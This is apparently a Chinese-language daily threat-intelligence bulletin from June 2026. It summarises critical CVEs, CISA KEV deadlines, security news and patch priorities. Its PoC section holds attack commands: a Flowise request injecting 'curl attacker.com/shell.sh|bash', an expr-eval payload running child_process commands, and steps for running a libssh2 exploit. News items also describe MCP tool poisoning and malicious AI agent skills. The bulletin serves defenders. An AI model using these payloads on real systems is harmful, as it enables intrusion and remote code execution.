每日安全情报报告

日期：2026-06-25 |风险级别：🔴 严重 |在野利用：5 个 CVE

一、高危漏洞速报

🔴 严重级（CVSS 9.0+）

1. CVE-2026-34908 / 34909 / 34910 — Ubiquiti UniFi OS 三重 CVSS 10.0 设备接管链

属性	详情
CVE 编号	CVE-2026-34908（访问控制绕过）、CVE-2026-34909（路径遍历）、CVE-2026-34910（命令注入）
CVSS 评分	10.0 × 3（全部满分）
漏洞类型	访问控制绕过 + 路径遍历 + 命令注入 → 完整设备接管链
受影响组件	Ubiquiti UniFi OS（Cloud Gateways、Network Controllers、Protect NVRs、Access Hubs、Talk 设备）
攻击向量	网络相邻，无需认证，一条 HTTP 请求即可获取 Root 权限
在野利用	🔴CISA KEV — 6月23日添加，截止日期 6月26日（BOD 26-04 三天强制令）
修复版本	Ubiquiti 已发布补丁

风险分析：三漏洞串联形成完整攻击链：访问控制绕过 → 路径遍历读取任意文件 → 命令注入获取 Root。BOD 26-04 规定联邦机构必须在 6月26日前修复，仅剩1天。

NVD - CVE-2026-34908 详情
NVD - CVE-2026-34909 详情
NVD - CVE-2026-34910 详情
阅读原文 — CyberLeveling 分析

2. CVE-2026-56274 — Flowise AI MCP 服务器 OS 命令注入

属性	详情
CVE 编号	CVE-2026-56274
CVSS 评分	9.9
漏洞类型	OS 命令注入（CWE-78）
受影响组件	Flowise < 3.1.2（开源 LLM 应用构建平台）
攻击向量	Custom MCP Server 功能中多个注入点；任何角色用户可利用，或通过 API（view/update 权限）
修复版本	Flowise 3.1.2+

风险分析：AI/LLM 平台安全再次成为焦点。Flowise 作为流行的低代码 AI 构建平台，MCP Server 自定义功能的安全校验不完整，允许通过validateCommandFlags和validateArgsForLocalFileAccess绕过注入命令。直接影响 AI 应用供应链安全。

NVD 详情
阅读原文 — Threat Modeling 分析
查看详情 — VulnCheck Advisory

3. CVE-2026-56315 — picklescan 绕过（Python ML 供应链安全失效）

属性	详情
CVE 编号	CVE-2026-56315（主 CVE）+ CVE-2025-71376/71370/71365/71341（4个绕过子项）
CVSS 评分	9.8（主 CVE）
漏洞类型	安全检查绕过（CWE-184）
受影响组件	picklescan < 1.0.4（Python pickle 安全扫描工具，集成于 Hugging Face 模型安全管道）
攻击向量	未能阻止 7 个 Python 标准库模块暴露 8 个任意命令执行函数
修复版本	picklescan 1.0.4+

风险分析：picklescan 是 ML 供应链关键安全关卡，5个绕过 CVE 意味着依赖该工具做安全检查的组织一直处于虚假安全感中。恶意模型可通过idlelib.autocomplete、torch.jit.unsupported_tensor_ops、numpy.f2py.crackfortran.myeval、profile.Profile.runctx等路径绕过检测。

NVD - CVE-2026-56315 详情
阅读原文 — Threat Modeling 报告

4. CVE-2026-12866 — expr-eval 任意 JavaScript 执行（⚠️ 无补丁）

属性	详情
CVE 编号	CVE-2026-12866
CVSS 评分	9.8
漏洞类型	任意代码执行
受影响组件	expr-eval（所有版本）— npm 每周下载量超 200 万的 JavaScript 表达式评估库
攻击向量	`toJSFunction()`API 通过`new Function()`将用户控制表达式编译为原生代码
修复状态	⚠️尚无补丁— 建议迁移至沙箱化表达式评估器

风险分析：expr-eval 是 npm 上极广泛使用的库，所有版本均受影响且无修复方案。任何接受用户输入并传入toJSFunction()或evaluate()的应用均存在 RCE 风险。建议立即评估依赖并迁移至安全替代方案。

NVD 详情
阅读原文 — Corgea 分析
查看详情 — Threat Modeling 分析

5. CVE-2026-11374 — ManageEngine SSO 令牌可预测（4 产品线受影响）

属性	详情
CVE 编号	CVE-2026-11374
CVSS 评分	9.0
漏洞类型	SSO 令牌可预测（随机性不足）
受影响组件	ADSelfService Plus、RecoveryManager Plus、M365 Manager Plus、ADAudit Plus
攻击向量	可预测令牌实现会话劫持；共享 SSO 令牌生成库弱点影响整个产品线

阅读原文 — Threat Modeling 报告

6. CVE-2026-9733 — Mojolicious OAuth2 不安全 state 参数

属性	详情
CVE 编号	CVE-2026-9733
CVSS 评分	9.1
漏洞类型	OAuth2 state 参数可预测（CWE-340）
受影响组件	Mojolicious::Plugin::Web::Auth::OAuth2 ≤ 0.17（Perl 模块）
攻击向量	state 使用 SHA-1 哈希（可预测的 epoch 时间 + 低熵源），可实施 OAuth2 授权码拦截攻击

NVD 详情
查看详情 — CVEFeed

🟠 高危级（CVSS 7.0–8.9）

7. CVE-2026-20262 — Cisco SD-WAN Manager 路径遍历（🔴 在野利用）

属性	详情
CVE 编号	CVE-2026-20262
CVSS 评分	中危评级但实际危害极高（认证后 Root 权限获取）
漏洞类型	路径遍历 → 任意文件写入 → Root 权限提升
受影响组件	Cisco Catalyst SD-WAN Manager（前称 vManage）
在野利用	🔴CISA KEV — 正在被主动利用，截止日期 6月29日

风险分析：经认证的攻击者可创建或覆盖任意文件，进而获取 Root 权限。已在 CISA KEV 目录中确认在野利用。

阅读原文 — Cisco 安全公告
阅读原文 — The Hacker News
查看详情 — HaloSecurity 分析

8. CVE-2026-20971 — Samsung KNOX 内核 UAF（潜伏 8 年）

属性	详情
CVE 编号	CVE-2026-20971
CVSS 评分	高危（内核级 UAF）
漏洞类型	Use-After-Free（PROCA/FIVE 安全子系统内核竞态）
受影响组件	Samsung Galaxy 设备 KNOX 安全框架
攻击向量	内核内存腐败 → 潜在完全设备控制
修复状态	Samsung 已于 2026年1月发布补丁，但大量设备可能未更新

风险分析：LucidBit 安全团队发现的这个漏洞在 KNOX 安全子系统（本身是安全防护组件）中潜伏超过8年。讽刺的是，安全框架自身存在内核 UAF，可导致内核内存腐败甚至完全设备接管。

阅读原文 — Security Affairs
阅读原文 — CybersecurityNews
查看详情 — GBHackers

9. CVE-2026-11645 — Chrome V8 越界读写零日（🔴 在野利用）

属性	详情
CVE 编号	CVE-2026-11645
CVSS 评分	高危（V8 引擎越界读写 → 沙箱内代码执行）
漏洞类型	V8 引擎越界读写
受影响组件	Google Chrome V8 JavaScript 引擎
在野利用	🔴CISA KEV — 6月9日添加，2026年第五个 Chrome 在野零日

风险分析：这是 2026 年 Google 修复的第五个在野利用的 Chrome 零日。前四个分别为 CVE-2026-2441、CVE-2026-3909 等。Chrome 零日持续高频出现，建议所有用户确保浏览器版本 ≥ Chrome 149。

阅读原文 — The Hacker News
查看详情 — SecurityVulnerability.io

10. CVE-2026-56225/56243/56322/56248 — Capgo 移动应用交付平台 4 漏洞

CVE 编号	类型	CVSS	详情
CVE-2026-56225	授权绕过	8.3	`mode=all`API 密钥可访问所有应用
CVE-2026-56243	哈希密钥绕过	8.1	通过 PostgREST/RLS 平面绕过哈希 API 密钥
CVE-2026-56322	信息泄露	7.5	`/updates`端点未认证信息泄露
CVE-2026-56248	拒绝服务	7.5	未认证 DoS

修复版本：Capgo 12.128.2+

二、漏洞 PoC 速递

PoC 1：Ubiquiti UniFi OS 三重 CVE 漏洞链利用

属性	详情
CVE	CVE-2026-34908 + CVE-2026-34909 + CVE-2026-34910
类型	访问控制绕过 → 路径遍历 → 命令注入 → Root
来源	安全社区公开分析

利用步骤：

发送 HTTP 请求到 UniFi OS 管理接口，利用 CVE-2026-34908 绕过访问控制
利用 CVE-2026-34909 路径遍历读取任意文件（如/etc/passwd、配置文件）
利用 CVE-2026-34910 命令注入注入系统命令，获取 Root shell

检测方法：

# 检查 UniFi OS 版本 curl -sk https://<unifi-host>/api/system # 检查是否已修复 curl -sk https://<unifi-host>/api/upgrage/check

阅读原文 — 漏洞链详细分析
查看详情 — CN-SEC 中文分析

PoC 2：Flowise AI MCP Server 命令注入（CVE-2026-56274）

属性	详情
CVE	CVE-2026-56274
类型	OS 命令注入（MCP Server 安全校验绕过）
来源	VulnCheck 公开 Advisory

利用步骤：

# 1. 克隆 Flowise 旧版本 git clone https://github.com/FlowiseAI/Flowise.git cd Flowise git checkout <version-before-3.1.2> # 2. 安装依赖并启动 npm install npm run start # 3. 通过 API 创建恶意 MCP Server 配置 # 在 Custom MCP Server 功能中注入命令： # validateCommandFlags 绕过：传入包含 shell 元字符的命令参数 # validateArgsForLocalFileAccess 绕过：构造特殊参数实现文件访问越权 # 4. 示例攻击请求 curl -X POST http://localhost:3000/api/v1/chatflows/<id> \ -H "Content-Type: application/json" \ -d '{"mcpServers": [{"command": "bash; id", "args": ["-c", "curl attacker.com/shell.sh|bash"]}]}'

修复建议：升级至 Flowise 3.1.2+

查看详情 — VulnCheck Advisory
阅读原文 — ThreatClaw 分析

PoC 3：expr-eval 任意 JavaScript 执行（CVE-2026-12866）

属性	详情
CVE	CVE-2026-12866
类型	任意 JavaScript 代码执行
来源	NVD / Corgea 公开研究
⚠️ 无补丁	所有版本受影响，尚无修复版本

利用步骤：

# 1. 安装 expr-eval npm install expr-eval # 2. 利用 toJSFunction() API 执行任意代码 node -e " const { Parser } = require('expr-eval'); const parser = new Parser(); // 构造恶意表达式 const expr = parser.parse('process.mainModule.require(\"child_process\").execSync(\"id\")'); const fn = expr.toJSFunction({}); console.log(fn()); " # 3. evaluate() 也可通过 MEMBER 操作触发 node -e " const parser = new Parser(); const expr = parser.parse('__proto__.polluted'); expr.evaluate({}, { allowMemberAccess: true }); "

修复建议：无官方补丁，建议立即迁移至安全替代方案（如math-expression-evaluator或safe-eval等沙箱化评估器）

阅读原文 — Corgea 深度分析
NVD 详情

PoC 4：Microsoft Exchange Server 权限提升漏洞

属性	详情
类型	Exchange 服务器文件读取权限提升
来源	FreeBuf 公开 PoC 报道

利用步骤：

# 1. 获取 Exchange 服务器认证凭据（需域用户权限） # 2. 利用 SSRF 漏洞（CVE-2026-45504 类）构造特殊请求 # 3. 通过 Exchange Web 服务端点读取任意文件 # 4. 提升权限至系统管理员

阅读原文 — FreeBuf PoC 报道

PoC 5：libssh2 远程代码执行（CVE-2026-55200）

属性	详情
CVE	CVE-2026-55200
类型	预认证远程代码执行
来源	FreeBuf 公开 PoC 报道

利用步骤：

# 1. 克隆 PoC 仓库 git clone https://github.com/bikini/exploitarium.git cd exploitarium/libssh2-CVE-2026-55200 # 2. 安装依赖 pip install -r requirements.txt # 3. 执行 PoC（需目标 SSH 服务器地址） python exploit.py --target <ssh-server-ip> --port 22

阅读原文 — FreeBuf PoC 报道

三、网络安全精选文章

📰 文章 1：GhostShell 恶意软件利用 mTLS 植入攻击乌克兰无人机作战体系

来源：CybersecurityNews |日期：2026-06-25

GhostShell 新型恶意软件集群自 2026年2月起持续攻击乌克兰无人机（UAV）作战及国防供应链。攻击使用伪造无人机技术文档作为诱饵，通过 mutual TLS（mTLS）植入程序确保通信隐蔽性，并利用 Telegram 死投（dead drop）机制实现 C2 隧道。该组织手法极为精密，对国防供应链安全构成严重威胁。

阅读原文
查看详情 — Cyberpress

📰 文章 2：三星 KNOX 8年潜伏内核 UAF 漏洞危及数百万 Galaxy 设备

来源：Security Affairs |日期：2026-06-25

LucidBit 安全团队发现 Samsung KNOX 安全子系统（PROCA/FIVE）中存在一个潜伏超过8年的内核 Use-After-Free 漏洞（CVE-2026-20971）。讽刺的是，安全框架自身存在内核级漏洞，可导致内核内存腐败甚至完全设备接管。Samsung 已于 2026年1月修补，但大量设备可能未及时更新。

阅读原文

📰 文章 3：Rokarolla 新型安卓银行木马 — 217款金融App + 137条远程指令

来源：The Hacker News / Zimperium |日期：2026-06-16

Rokarolla 是一种新型 Android 银行木马，目标覆盖217款银行和加密货币App，支持137条 C2 远程指令。其技术突破在于完全抛弃 MediaProjection 截屏方式，改用 Android 辅助功能（Accessibility Service）实现静默截屏和界面操控，隐蔽性极强。通过恶意网站分发，感染后可窃取 PIN、短信验证码、截屏、按键记录等。

阅读原文 — The Hacker News
阅读原文 — FreeBuf 中文分析

📰 文章 4：MCP 工具投毒与 rug pull：从恶意 Server 到本地 RCE 的攻击路径

来源：FreeBuf |日期：2026-06-24

MCP（Model Context Protocol）协议的 Server 端成为新攻击面。攻击者通过发布恶意 MCP Server 或对现有 Server 实施 rug pull（突然篡改代码），可实现从工具投毒到本地 RCE 的完整攻击链。本文详细分析了 MCP 协议的信任模型缺陷和攻击路径。

阅读原文

📰 文章 5：Dify 平台漏洞致跨租户窃听 AI 数据 — 超百万应用受影响

来源：FreeBuf |日期：2026-06-24

开源 AI 应用平台 Dify 存在跨租户数据泄露漏洞，攻击者可跨越租户边界窃听其他租户的 AI 数据（包括对话记录、模型配置等）。受影响应用超过百万，企业使用 Dify 构建的 AI 服务面临严重数据泄露风险。

阅读原文

📰 文章 6：红队 AI 工具漏洞致攻击者窃取 API 密钥并入侵操作者系统

来源：FreeBuf |日期：2026-06-25

安全红队使用的 AI 工具本身存在漏洞，攻击者可利用该漏洞反向窃取红队操作者的 API 密钥，甚至入侵操作者系统。这是一个典型的"工具反噬"场景，安全从业者使用的工具自身安全性亟需审视。

阅读原文

📰 文章 7：Nginx 两大高危解析类漏洞深度剖析与复现

来源：FreeBuf |日期：2026-06-25

Nginx 解析漏洞和 CVE-2013-4547 本质都是"解析逻辑缺陷"，但触发条件和利用方式不同。本文对两大高危解析类漏洞进行了深度剖析与实战复现，涵盖路径构造、文件类型混淆等关键技术细节。

阅读原文

📰 文章 8：白宫下令联邦机构将系统迁移至抗量子密码标准

来源：FreeBuf |日期：2026-06-25

白宫发布指令，要求联邦机构在 2030年前完成抗量子密码迁移，防范"先窃取后解密"（Harvest Now, Decrypt Later）攻击。这是全球抗量子密码标准化的重大政策推动。

阅读原文

📰 文章 9：恶意 AI Agent 技能通过安全检查触达 2.6 万用户

来源：FreeBuf |日期：2026-06-24

恶意 AI Agent 技能（Skill/Plugin）成功绕过安全审查机制，触达26,000名用户，实施钓鱼攻击。该案例揭示了 AI Agent 技能生态中的安全审查盲区——当前检查机制无法有效识别恶意行为意图。

阅读原文

📰 文章 10：Scattered Spider 入侵伦敦交通局内网致 2900万英镑损失

来源：FreeBuf |日期：2026-06-24

黑客组织 Scattered Spider（又名 0ktapus/Starfraud）入侵伦敦交通局（TfL）内网，造成2900万英镑损失。两名成员已认罪。该组织擅长社会工程学攻击和 SIM 交换，多次针对大型企业实施入侵。

阅读原文

四、CISA KEV 动态

本周新增 KEV 条目（6月23日）

CVE	产品	截止日期	状态
CVE-2026-34908	Ubiquiti UniFi OS	6月26日	⏰ 仅剩1天
CVE-2026-34909	Ubiquiti UniFi OS	6月26日	⏰ 仅剩1天
CVE-2026-34910	Ubiquiti UniFi OS	6月26日	⏰ 仅剩1天
CVE-2025-67038	Lantronix EDS5000	6月26日	⏰ 仅剩1天
CVE-2026-20262	Cisco SD-WAN	6月29日	🔴 在野利用
CVE-2026-20245	Cisco SD-WAN	6月23日	❌ 已逾期

逾期未修复的 KEV 项（高危提醒）

CVE	产品	逾期天数	严重程度
CVE-2026-20253	Splunk	+3天	🔴 在野利用
CVE-2026-0257	PAN-OS GlobalProtect	+23天	🔴 严重逾期
CVE-2026-42271	LiteLLM	+2天	⚠️
CVE-2026-48907	Joomla CE	+5天	⚠️
CVE-2026-28318	SolarWinds	+5天	⚠️

⚠️特别提醒：PAN-OS CVE-2026-0257 已逾期23天，Splunk CVE-2026-20253 已逾期 3天且正在被主动利用。使用相关产品的组织需立即采取行动。

查看详情 — CISA KEV 2026 目录
阅读原文 — CISA KEV June 2026 更新分析

五、风险总结与建议

🔴 本期重点威胁

Ubiquiti UniFi OS 三重 CVSS 10.0— 无认证 Root 接管，BOD 截止仅剩1天
Cisco SD-WAN 在野利用— 已有主动攻击证据，截止6月29日
expr-eval 全版本 RCE 无补丁— 200万 npm 周下载量，立即评估迁移
picklescan 5 绕过— ML 供应链安全关卡失效，Hugging Face 模型下载需注意
MCP 协议攻击面— Flowise + MCP 投毒 + 恶意 AI Skill，AI 安全成系统性风险

📋 行动建议

优先级	建议事项
🔴 立即	Ubiquiti UniFi OS 设备紧急打补丁（BOD 6月26日截止）
🔴 立即	Cisco SD-WAN Manager 升级至修复版本
🔴 立即	Flowise 升级至 3.1.2+
🟠 48h	Chrome 升级至最新版本（≥ 149）
🟠 48h	检查项目依赖是否使用 expr-eval，评估迁移方案
🟠 48h	picklescan 升级至 1.0.4+，重新扫描已部署模型
🟡 本周	Samsung Galaxy 设备安全更新检查
🟡 本周	审计 MCP Server 使用情况，检查 AI Agent 技能安全

报告生成时间：2026-06-25 09:22 CST
数据来源：NVD、CISA KEV、Threat Modeling、The Hacker News、FreeBuf、Security Affairs、CybersecurityNews、VulnCheck、Corgea